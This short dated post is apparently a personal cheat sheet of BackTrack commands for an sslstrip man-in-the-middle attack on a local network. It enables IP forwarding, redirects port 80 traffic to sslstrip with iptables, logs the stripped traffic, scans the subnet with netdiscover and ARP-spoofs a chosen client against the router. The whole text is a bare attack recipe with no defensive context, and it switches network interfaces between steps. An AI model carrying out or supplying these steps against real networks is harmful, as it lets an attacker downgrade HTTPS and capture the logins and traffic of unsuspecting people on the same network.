25 October, 2013

sslstrip

Start Forwarding 
root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward 

Configure iptables
root@bt:~# iptables --flush
root@bt:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

Run sslstrip
root@bt:~# cd /pentest/web/sslstrip/
root@bt:/pentest/web/sslstrip# python sslstrip.py -w Log &

Network Scan
root@bt:~# netdiscover -i eth0 -r 192.168.1.1/24 

ARP Spoofing
root@bt:~# arpspoof -i eth2 -t (ClientIP) (RouterIP) &